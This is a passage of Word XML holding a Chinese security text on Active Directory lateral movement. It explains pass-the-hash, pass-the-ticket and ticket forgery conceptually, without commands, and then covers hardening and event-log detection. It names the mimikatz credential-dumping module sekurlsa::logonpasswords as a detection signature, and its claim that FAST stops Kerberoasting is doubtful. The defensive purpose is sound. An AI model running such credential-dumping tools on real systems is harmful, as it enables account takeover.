        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后，可在远程</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SMB/WMI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证时提供该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">而非密码，从而以该用户身份执行命令。违反假设：密码学上，hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应为单向不可逆，但协议设计令“知道</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hash”即等同于“知道密码”。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Pass-the-Ticket (PtT)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者导出内存中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kerberos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">票据（TGT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ST），将其导入自己的会话。系统认为攻击者已通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KDC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证，可直接访问票据所授权的服务。违反假设：票据仅应属于通过身份验证的那个登录会话。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Overpass-the-Hash (Pass-the-Key)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者使用获取的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NTLM hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KDC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TGT（即用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加密时间戳作为认证符，代替密码请求</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">AS-REQ），从而获得合法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TGT，之后行为与正常</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kerberos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录无异。违反假设：Kerberos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证应基于用户键入的密码，而不应接受直接由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">生成的有效请求。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">票据伪造（黄金/白银票据）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：基于已知的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> krbtgt hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或服务</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">直接构造票据，跳过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">KDC。黄金票据可伪造任意用户的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TGT，任意组成员，无限期有效。白银票据针对特定服务伪造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ST。违反假设：票据完整性完全依赖仅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KDC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和服务知晓的密钥，密钥泄露则防线全溃。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">横向移动的执行载体</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（概念③，不提供完整命令）：攻击者常利用内建管理工具如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PsExec、WMI、WinRM、RDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等，在被控主机远程执行命令。这些工具本身是合法系统管理组件，但被用于横向移动时，蓝队需检测其异常调用模式（例如非管理员常用主机突然创建远程服务）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框：域环境的分层防御与异常检测（强制收口）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">前面阐述了攻击者如何利用信任与凭据复用进行横向移动，对应地，蓝队必须基于零信任原则构建多层防御体系：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御原则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">分层管理（Tiered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Administration）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将域管理员账户严格限制在最高</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Tier0（DC、敏感服务器）使用，禁止用域管账户登录低</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">工作站，防止凭据泄漏后横向扩散。普通工作站使用独立的本地管理员密码方案（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">LAPS）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">最小权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：遵循最小权限原则分配用户和服务账户权限，特别要限制具有特定敏感</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SPN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的服务账户。定期审计</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AdminSDHolder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和受保护组（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Domain Admins、Enterprise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Admins）的成员。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Kerberos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">加固</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kerberos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Armoring（FAST）：通过将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求加密在计算机账户的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TGT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中，使</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求内容难以探测和离线爆破，防御</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kerberoasting。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">禁用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RC4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加密，强制使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加密票证；定期更换</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> krbtgt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">密码（每次更换两次，断开已有票据的伪造链）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">验证和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">过滤，限制跨林票据攻击。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将敏感用户加入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Protected Users”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">组，强制仅使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kerberos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证（不缓存</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NTLM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hash），禁用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DES/RC4，避免允许委派。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">端点安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在主机上启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Credential </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Guard（基于虚拟化隔离保护</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LSASS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">凭据），阻挡凭据导出工具。部署</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Microsoft Defender </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Identity（原</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ATA）或等效的端点检测代理监控</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LSASS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测与监控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">日志源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：域控制器上的安全日志（事件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4624：登录成功，4625：登录失败，4768：TGT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求（AS-REQ），4769：ST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求（TGS-REQ），4771：Kerberos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">预认证失败），工作站上的登录事件和进程创建事件（4688），以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PowerShell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块和脚本块日志（4104/4105）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">异常检测要点（参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">技术映射）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Pass-the-Hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：识别使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NTLM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议（事件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4624 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的登录类型</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">且身份验证包为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLMSSP）的远程登录，尤其是来自非域主机、非管理员常规工作站执行的特权账户登录；同时检测已知</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mimikatz </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等工具的特征（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sekurlsa::logonpasswords</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的执行模式，可通过命令行审计和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AMSI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">拦截）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Pass-the-Ticket </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：检测一个用户</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ticket </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从一个主机导出后在另一主机使用，可通过分析</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TGT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的会话信息（事件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4768/4769 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中包含的源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">变化）以及票据生命周期异常。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">黄金票据伪造检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：监控</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Event ID 4769 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TGS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求，检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ticket Encrypting Type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RC4（且未正常出现在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KDC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">签发流程中），票据有效期异常（例如</w:t>
      </w:r>
      <w:r>
